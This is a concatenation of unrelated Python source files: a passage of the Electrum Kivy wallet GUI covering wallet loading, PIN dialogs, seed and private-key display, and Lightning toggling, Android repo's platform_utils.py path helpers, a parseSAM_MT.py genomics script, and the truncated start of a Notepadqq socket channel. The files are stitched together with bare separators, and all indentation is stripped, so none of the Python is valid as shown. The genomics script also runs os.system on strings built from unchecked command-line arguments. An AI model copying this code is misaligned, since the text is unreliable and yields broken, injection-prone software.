if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.network.register_callback(self.on_channels, ['channels_updated'])
self.network.register_callback(self.on_channel, ['channel'])
self.network.register_callback(self.on_invoice_status, ['invoice_status'])
self.network.register_callback(self.on_request_status, ['request_status'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage):
if storage:
wallet = Wallet(storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if platform == 'android' and wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
wizard.run('new')
elif storage.is_encrypted():
raise Exception("Kivy GUI does not support encrypted wallet files.")
elif storage.requires_upgrade():
wizard.upgrade_storage(storage)
else:
raise Exception("unexpected storage file situation")
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if not self.wallet.has_lightning():
self.show_error('Lightning not enabled on this wallet')
return
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, invoice=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if invoice:
key = invoice['id']
txid = tx.txid()
self.wallet.set_label(txid, invoice['message'])
self.wallet.set_paid(key, txid)
self.update_tab('invoices')
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
platform_utils.py
|
# -*- coding:utf-8 -*-
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import os
import platform
import select
import shutil
import stat
from pyversion import is_python3
if is_python3():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
def isWindows():
""" Returns True when running with the native port of Python for Windows,
False when running on any other platform (including the Cygwin port of
Python).
"""
# Note: The cygwin port of Python returns "CYGWIN_NT_xxx"
return platform.system() == "Windows"
class FileDescriptorStreams(object):
""" Platform agnostic abstraction enabling non-blocking I/O over a
collection of file descriptors. This abstraction is required because
fctnl(os.O_NONBLOCK) is not supported on Windows.
"""
@classmethod
def create(cls):
""" Factory method: instantiates the concrete class according to the
current platform.
"""
if isWindows():
return _FileDescriptorStreamsThreads()
else:
return _FileDescriptorStreamsNonBlocking()
def __init__(self):
self.streams = []
def add(self, fd, dest, std_name):
""" Wraps an existing file descriptor as a stream.
"""
self.streams.append(self._create_stream(fd, dest, std_name))
def remove(self, stream):
""" Removes a stream, when done with it.
"""
self.streams.remove(stream)
@property
def is_done(self):
""" Returns True when all streams have been processed.
"""
return len(self.streams) == 0
def select(self):
""" Returns the set of streams that have data available to read.
The returned streams each expose a read() and a close() method.
When done with a stream, call the remove(stream) method.
"""
raise NotImplementedError
def _create_stream(fd, dest, std_name):
""" Creates a new stream wrapping an existing file descriptor.
"""
raise NotImplementedError
class _FileDescriptorStreamsNonBlocking(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that support
non blocking I/O.
"""
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.set_non_blocking()
def set_non_blocking(self):
import fcntl
flags = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def fileno(self):
return self.fd.fileno()
def read(self):
return self.fd.read(4096)
def close(self):
self.fd.close()
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name)
def select(self):
ready_streams, _, _ = select.select(self.streams, [], [])
return ready_streams
class _FileDescriptorStreamsThreads(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that don't support
non blocking I/O. This implementation requires creating threads issuing
blocking read operations on file descriptors.
"""
def __init__(self):
super(_FileDescriptorStreamsThreads, self).__init__()
# The queue is shared accross all threads so we can simulate the
# behavior of the select() function
self.queue = Queue(10) # Limit incoming data from streams
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name, self.queue)
def select(self):
# Return only one stream at a time, as it is the most straighforward
# thing to do and it is compatible with the select() function.
item = self.queue.get()
stream = item.stream
stream.data = item.data
return [stream]
class QueueItem(object):
""" Item put in the shared queue """
def __init__(self, stream, data):
self.stream = stream
self.data = data
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name, queue):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.queue = queue
self.data = None
self.thread = Thread(target=self.read_to_queue)
self.thread.daemon = True
self.thread.start()
def close(self):
self.fd.close()
def read(self):
data = self.data
self.data = None
return data
def read_to_queue(self):
""" The thread function: reads everything from the file descriptor into
the shared queue and terminates when reaching EOF.
"""
for line in iter(self.fd.readline, b''):
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, line))
self.fd.close()
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, None))
def symlink(source, link_name):
"""Creates a symbolic link pointing to source named link_name.
Note: On Windows, source must exist on disk, as the implementation needs
to know whether to create a "File" or a "Directory" symbolic link.
"""
if isWindows():
import platform_utils_win32
source = _validate_winpath(source)
link_name = _validate_winpath(link_name)
target = os.path.join(os.path.dirname(link_name), source)
if isdir(target):
platform_utils_win32.create_dirsymlink(_makelongpath(source), link_name)
else:
platform_utils_win32.create_filesymlink(_makelongpath(source), link_name)
else:
return os.symlink(source, link_name)
def _validate_winpath(path):
path = os.path.normpath(path)
if _winpath_is_valid(path):
return path
raise ValueError("Path \"%s\" must be a relative path or an absolute "
"path starting with a drive letter".format(path))
def _winpath_is_valid(path):
"""Windows only: returns True if path is relative (e.g. ".\\foo") or is
absolute including a drive letter (e.g. "c:\\foo"). Returns False if path
is ambiguous (e.g. "x:foo" or "\\foo").
"""
assert isWindows()
path = os.path.normpath(path)
drive, tail = os.path.splitdrive(path)
if tail:
if not drive:
return tail[0] != os.sep # "\\foo" is invalid
else:
return tail[0] == os.sep # "x:foo" is invalid
else:
return not drive # "x:" is invalid
def _makelongpath(path):
"""Return the input path normalized to support the Windows long path syntax
("\\\\?\\" prefix) if needed, i.e. if the input path is longer than the
MAX_PATH limit.
"""
if isWindows():
# Note: MAX_PATH is 260, but, for directories, the maximum value is actually 246.
if len(path) < 246:
return path
if path.startswith(u"\\\\?\\"):
return path
if not os.path.isabs(path):
return path
# Append prefix and ensure unicode so that the special longpath syntax
# is supported by underlying Win32 API calls
return u"\\\\?\\" + os.path.normpath(path)
else:
return path
def rmtree(path):
"""shutil.rmtree(path) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
if isWindows():
shutil.rmtree(_makelongpath(path), onerror=handle_rmtree_error)
else:
shutil.rmtree(path)
def handle_rmtree_error(function, path, excinfo):
# Allow deleting read-only files
os.chmod(path, stat.S_IWRITE)
function(path)
def rename(src, dst):
"""os.rename(src, dst) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
if isWindows():
# On Windows, rename fails if destination exists, see
# https://docs.python.org/2/library/os.html#os.rename
try:
os.rename(_makelongpath(src), _makelongpath(dst))
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(_makelongpath(dst))
os.rename(_makelongpath(src), _makelongpath(dst))
else:
raise
else:
os.rename(src, dst)
def remove(path):
"""Remove (delete) the file path. This is a replacement for os.remove that
allows deleting read-only files on Windows, with support for long paths and
for deleting directory symbolic links.
Availability: Unix, Windows."""
if isWindows():
longpath = _makelongpath(path)
try:
os.remove(longpath)
except OSError as e:
if e.errno == errno.EACCES:
os.chmod(longpath, stat.S_IWRITE)
# Directory symbolic links must be deleted with 'rmdir'.
if islink(longpath) and isdir(longpath):
os.rmdir(longpath)
else:
os.remove(longpath)
else:
raise
else:
os.remove(path)
def walk(top, topdown=True, onerror=None, followlinks=False):
"""os.walk(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
return _walk_windows_impl(top, topdown, onerror, followlinks)
else:
return os.walk(top, topdown, onerror, followlinks)
def _walk_windows_impl(top, topdown, onerror, followlinks):
try:
names = listdir(top)
except Exception as err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if isdir(os.path.join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = os.path.join(top, name)
if followlinks or not islink(new_path):
for x in _walk_windows_impl(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
def listdir(path):
"""os.listdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.listdir(_makelongpath(path))
def rmdir(path):
"""os.rmdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
os.rmdir(_makelongpath(path))
def isdir(path):
"""os.path.isdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.path.isdir(_makelongpath(path))
def islink(path):
"""os.path.islink(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.islink(_makelongpath(path))
else:
return os.path.islink(path)
def readlink(path):
"""Return a string representing the path to which the symbolic link
points. The result may be either an absolute or relative pathname;
if it is relative, it may be converted to an absolute pathname using
os.path.join(os.path.dirname(path), result).
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.readlink(_makelongpath(path))
else:
return os.readlink(path)
def realpath(path):
"""Return the canonical path of the specified filename, eliminating
any symbolic links encountered in the path.
Availability: Windows, Unix.
"""
if isWindows():
current_path = os.path.abspath(path)
path_tail = []
for c in range(0, 100): # Avoid cycles
if islink(current_path):
target = readlink(current_path)
current_path = os.path.join(os.path.dirname(current_path), target)
else:
basename = os.path.basename(current_path)
if basename == '':
path_tail.append(current_path)
break
path_tail.append(basename)
current_path = os.path.dirname(current_path)
path_tail.reverse()
result = os.path.normpath(os.path.join(*path_tail))
return result
else:
return os.path.realpath(path)
|
parseSAM_MT.py
|
#!/usr/bin/python
import sys
import os
import threading
def GetPathAndName(pathfilename):
ls=pathfilename.split('/')
filename=ls[-1]
path='/'.join(ls[0:-1])+'/'
return path, filename
#Main**************************************************************************#
def main():
# Read input parameters
bin_path,command = GetPathAndName(sys.argv[0])
regions_filename = sys.argv[1]
reads_filename = sys.argv[2]
num_threads = int(sys.argv[3])
python_path = sys.argv[4]
read_len = sys.argv[5]
min_junction_overlap_len = sys.argv[6]
output_filename = 'refSeq_MLE_input.txt'
reads_file = open(reads_filename, 'r' )
reads_files = []
for thread_idx in range(num_threads):
reads_files.append(open(reads_filename + '.' + str(thread_idx), 'w'))
thread_idx = 0
for line in reads_file:
reads_files[thread_idx].write(line)
thread_idx = (thread_idx + 1) % num_threads
for thread_idx in range(num_threads):
reads_files[thread_idx].close()
reads_file.close()
##############################
threads_list = []
for thread_idx in range(num_threads):
cmd = (python_path + " " + bin_path + 'parseSAM.py ' + regions_filename + ' ' + reads_filename + '.' + str(thread_idx) +
' ' + output_filename + '.' + str(thread_idx) + ' ' + read_len + ' ' + min_junction_overlap_len)
print cmd
threads_list.append( threading.Thread(target=os.system, args=(cmd,)) )
threads_list[thread_idx].start()
for thread in threads_list:
thread.join()
output_file = open(output_filename, 'w')
output_files = []
header = 0
for thread_idx in range(num_threads):
output_files.append(open(output_filename + '.' + str(thread_idx), 'r'))
header += int(output_files[thread_idx].readline())
output_file.write(str(header) + '\n')
genes_str_map = {}
genes_reads_count_map = {}
for thread_idx in range(num_threads):
while True:
line = output_files[thread_idx].readline()
if (line == ''):
break
if not genes_str_map.has_key(line):
lines = line
isoforms_line = output_files[thread_idx].readline()
lines += isoforms_line
for i in range(4):
lines += output_files[thread_idx].readline()
for i in range(len(isoforms_line.split())):
lines += output_files[thread_idx].readline()
lines += output_files[thread_idx].readline()
genes_reads_count_map[line] = [int(i) for i in output_files[thread_idx].readline().split()]
genes_str_map[line] = lines
else:
isoforms_line = output_files[thread_idx].readline()
for i in range(4):
output_files[thread_idx].readline()
for i in range(len(isoforms_line.split())):
output_files[thread_idx].readline()
output_files[thread_idx].readline()
reads_count_line = [int(i) for i in output_files[thread_idx].readline().split()]
for i in range(len(reads_count_line)):
genes_reads_count_map[line][i] += reads_count_line[i]
genes = sorted(genes_str_map.keys())
for gene in genes:
output_file.write(genes_str_map[gene])
for i in range(len(genes_reads_count_map[gene])):
output_file.write(str(genes_reads_count_map[gene][i]).ljust(20))
output_file.write('\n')
for thread_idx in range(num_threads):
output_files[thread_idx].close()
rm_cmnd = "rm " + output_filename + '.' + str(thread_idx) + ' ' + reads_filename + '.' + str(thread_idx)
os.system(rm_cmnd)
output_file.close()
if __name__ == '__main__':
main()
|
message_channel.py
|
import logging
import socket
import json
import threading
import asyncio
class MessageChannel():
"""Send messages to Notepadqq and receive responses."""
def __init__(self, socket_path):
"""Initialize a new channel on the specified address."""
# FIXME Windows support
self._logger = logging.getLogger('MessageChannel')
self._socket_path = socket_path
self._unprocessed_messages = []
# Condition variable for self._unprocessed_messages
self._readCondition = threading.Condition()
# Used to wake up the main thread event loop whenever new messages
# are available.
self._notifyRead, self._notifyWrite = None, None
# Socket for communication with Notepadqq
self._socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._socket.setblocking(True)
def start(self, loop, handler_callback):
"""Connect to the socket and start reading data. The passed callback
will be called for each new incoming message.
"""
self._notifyRead, self._notifyWrite = socket.socketpair()
self._socket.connect(self._socket_path)
# Get a stream reader for the notification socket
